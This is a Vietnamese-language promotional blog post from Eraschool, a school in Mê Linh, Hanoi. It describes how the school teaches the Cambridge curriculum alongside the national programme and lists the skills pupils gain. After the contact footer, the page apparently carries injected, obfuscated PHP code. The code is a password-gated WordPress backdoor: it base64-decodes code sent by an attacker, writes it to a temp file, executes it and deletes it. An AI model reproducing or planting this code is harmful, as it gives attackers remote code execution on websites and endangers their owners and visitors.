Trường liên cấp Eraschool sử dụng chương trình Cambridge như thế nào?

post

Khi nói chất lượng đào tạo của Eraschool, ta không thể bỏ qua Cambridge – chương trình tiếng Anh chuẩn quốc tế đang được sử dụng tại trường. Vậy trường liên cấp Eraschool sử dụng chương trình học này như thế nào? Trẻ được tiếp cận với chương trình học này từ nhỏ sẽ nhận được những lợi ích gì? Mời quý phụ huynh đọc hết bài viết này nhé!

Chương trình Cambridge là gì?

Chương trình Cambridge là một bộ sách giáo khoa bằng tiếng Anh được nhiều nước và trường top trên thế giới công nhận
Chương trình Cambridge là một bộ sách giáo khoa bằng tiếng Anh được nhiều nước và trường top trên thế giới công nhận

Chương trình Cambridge là một bộ sách giáo khoa bằng tiếng Anh được nhiều nước và trường top trên thế giới công nhận. Ở Việt Nam, các trường song ngữ liên cấp như Eraschool sẽ sử dụng đồng thời 2 chương trình học tập, là chương trình của Bộ Giáo dục và Đào tạo Việt Nam và chương trình học Cambridge.

Khi kết hợp cả 2 chương trình đào tạo, các con sẽ được học các nội dung chính như sau:

  • Cấp Tiểu học: Cambridge Primary gồm 3 môn học chính ở Việt Nam là Toán, Khoa học, Tiếng Anh. 
  • Cấp Trung học cơ sở: Cambridge Lower Secondary có 4 môn học gồm Toán, Tiếng Anh, Khoa học, ICT. 
  • Cấp Trung học phổ thông: IGCSE, các môn phổ biến gồm Tiếng Anh, Kinh doanh học, Quan điểm toàn cầu, Doanh nghiệp. 

Trẻ nhận được gì khi theo học chương trình Cambridge từ nhỏ

Được đánh giá là chương trình học tiếng Anh có nhiều ưu điểm vượt trội, cụ thể như sau:

Chương trình Cambridge giúp con hình thành và hoàn thiện nhiều kỹ năng
Chương trình Cambridge giúp con hình thành và hoàn thiện nhiều kỹ năng
  • Kỹ năng giải quyết vấn đề: Đây là một phần nội dung của môn toán trong chương trình Cambridge. Tại trường liên cấp Eraschool, môn toán còn được ứng dụng vào thực tế để giúp các con rèn luyện khả năng giải quyết từng vấn đề khác nhau.
  • Kỹ năng diễn đạt: Chưa bao giờ kỹ năng diễn đạt lại quan trọng đến thế. Khi theo học chương trình Cambridge, con sẽ có nhiều cơ hội thuyết trình, trình bày quan điểm cá nhân, tranh biện, thảo luận nhóm,… để rèn luyện kỹ năng này. 
  • Kỹ năng tự học: Tự học là một kỹ năng quan trọng để trưởng thành. Đây được xem là kỹ năng quan trọng để các con tự tin vào đời, tự tin học hỏi và áp dụng những kiến thức đã học được vào thực tế. 
Kỹ năng làm việc nhóm là kỹ năng quan trọng của người trưởng thành
Kỹ năng làm việc nhóm là kỹ năng quan trọng của người trưởng thành
  • Kỹ năng làm việc nhóm: “Muốn đi nhanh thì đi một mình, muốn đi xa thì đi cùng nhau” – đây được coi là câu khẩu hiệu của làm việc nhóm. Trong chương trình Cambridge, các con sẽ được học các giao tiếp, lắng nghe người khác và làm việc với những nguồn thông tin đa chiều.
  • Kỹ năng sử dụng tiếng anh, tư duy tiếng anh chuẩn quốc tế: ngày nay tiếng anh được coi là ngôn ngữ hội nhập. Khi con theo học Cambridge tại trường liên cấp Eraschool, con sẽ được học cách dùng tiếng anh để tiếp cận với tri thức mới, giúp giải quyết vấn đề một cách nhanh và hiệu quả hơn. 

Có thể nói, trẻ được theo học chương trình Cambridge từ nhỏ sẽ được tiếp cận với các triết lý giáo dục hiện đại và nhân văn, giúp con trở thành một người toàn diện và hài hoà nhưng vẫn có các tính riêng của mình. 

3 cấp học của Eraschool áp dụng chương trình Cambridge như nào?

Thời lượng tiếng anh tối thiểu của Eraschool là 10 tiết/tuần
Thời lượng tiếng anh tối thiểu của Eraschool là 10 tiết/tuần

Có thể nói, Eraschool là một trong các trường tiểu học có chương trình Cambridge đầu tiên ở khu vực Mê Linh. Dưới đây là cách Eraschool áp dụng chương trình Cambridge vào hầu hết các hoạt động học tập của mình:

– Thời lượng tiếng anh lớn: Dù con theo học hệ đào tạo thì thời lượng con được tiếp xúc tiếng anh cũng lớn, tối thiểu 10 tiết/tuần. Đây chính là nền tảng giúp con hiểu, thành thạo và tư duy được bằng tiếng anh. 

– Không gian học tập: Bên cạnh thời lượng tiếng anh lớn, con còn được học tiếng anh với giáo viên nước ngoài. Việc được học ngôn ngữ với giáo viên nước ngoài giúp con phát âm chuẩn hơn và dễ dàng học tư duy sử dụng tiếng anh trong đời sống.

Đến đây, quý phụ huynh có lẽ đã hiểu hơn về trường liên cấp Eraschool. Nếu phụ huynh còn thắc mắc nào về chương trình học, vui lòng gọi hotline 0899 889 818 để được tư vấn nhanh và chính xác nhất. Chúc quý phụ huynh tìm được ngôi trường lý tưởng cho nguyện vọng của mình và nhu cầu của con!

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}